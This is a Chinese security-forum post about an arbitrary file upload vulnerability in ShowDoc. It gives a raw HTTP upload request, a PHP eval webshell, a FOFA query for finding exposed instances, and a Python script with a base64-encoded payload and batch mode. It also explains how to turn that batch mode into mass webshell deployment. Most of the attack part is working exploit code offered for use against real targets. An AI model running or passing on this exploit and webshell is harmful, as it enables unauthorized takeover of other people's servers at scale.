ShowDoc 任意文件上传漏洞

zhang3   ·   发表于 2022-11-04 17:59:31   ·   漏洞文章

漏洞描述

ShowDoc是一个非常适合IT团队的在线文档分享工具,它可以加快团队之间沟通的效率。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。ShowDoc系统存在任意文件上传漏洞,攻击者可以通过上传恶意文件执行任意命令,获取服务器管理权限。

漏洞复现

fofa:
app="ShowDoc"
1.使用POC上传phpinfo文件,回显上传路径即上传成功

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: your-ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 243
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Accept-Encoding: gzip

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.php"
Content-Type: text/plain

<?php phpinfo();?>
----------------------------921378126371623762173617--


2.访问该路径,得到回显
http:\/\/xxx.xxx.xxx.xxx:5000\/Public\/Uploads\/2022-10-24\/63564ca406058.php

3.尝试传马getshell

zhang3<?php
eval
($_POST
[a])
?>

poc:

#!/usr/local/bin/python3
# -*- coding: utf-8 -*-
# <span>@Time</span>    : 2022/10/24 19:52
# <span>@Author</span>  : popod1ng


import requests
import time
import re
import argparse
import urllib3
import base64

parser = argparse.ArgumentParser(description='帮助信息!')
parser.add_argument('-u', '--url', help='单个检测', default='')
parser.add_argument('-f', '--file', help='多个检测', default='')
urllib3.disable_warnings()
args = parser.parse_args()
name = '''
   _____ _                   _____             
  / ____| |                 |  __ \            
 | (___ | |__   _____      _| |  | | ___   ___ 
  \___ \| '_ \ / _ \ \ /\ / / |  | |/ _ \ / __|
  ____) | | | | (_) \ V  V /| |__| | (_) | (__ 
 |_____/|_| |_|\___/ \_/\_/ |_____/ \___/ \___|      

FOFA语法:app="ShowDoc"                                                          

'''
print(name)


def poc(url):
    target = url + "/index.php?s=/home/page/uploadImg"
    headers = {
        'Content-Type': 'multipart/form-data; boundary=--------------------------921378126371623762173617',
        'Content-Length': '260',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Accept-Encoding': 'gzip',
    }
    payload = '''
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTkyMTM3ODEyNjM3MTYyMzc2MjE3MzYxNwpDb250ZW50LURpc
3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVkaXRvcm1kLWltYWdlLWZpbGUiOyBmaWxlbmFtZT0idGVzdC
48PnBocCIKQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluCgo8P3BocCBwaHBpbmZvKCk7Pz4KLS0tLS0tLS0tLS0
tLS0tLS0tLS0tLS0tLS0tLTkyMTM3ODEyNjM3MTYyMzc2MjE3MzYxNy0t
      '''
    print("-" * 60)
    try:
        r = requests.post(url=target, headers=headers, data=base64.decodebytes(payload.encode('utf-8')).decode(),
                          timeout=8, verify=False)
        match = re.search(r'"url":"(.*?)",', r.text, re.I | re.M)
        s = match[1]
        s = s.replace('\\', '')
        print("正在检测:" + url)
        print("上传成功请访问:" + s)
    except:
        print("输入有误!")
    print("-" * 60)


def more(file):
    f = open(file, 'r')
    for i in f.readlines():
        i = i.strip()
        poc(i)
        print("验证完毕")


if __name__ == '__main__':
    if args.url != "" and args.file == "":
        poc(args.url)
    if args.url == "" and args.file != "":
        more(args.file)


验证成功:


fofa_gui工具:
https://github.com/Summer177/FOFA_GUI


将目标拷出来,放在.txt文件中:


批量化扫漏洞:


批量化getshell只需要把payload部分化成php一句话木马即可,用burp解密加密。

参考链接

https://mp.weixin.qq.com/s/9m3YSEDo-6JQRJTbgL25hg

用户名金币积分时间理由
Track-劲夫 60.00 0 2022-11-19 21:09:44 一个受益终生的帖子~~

打赏我,让我更有动力~

1 Reply   |  Until 2022-11-21 | 1408 View

lua
发表于 2022-11-21

这个一般提交cnvd,验证方式只需要phpinfo()验证还是getshell?

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.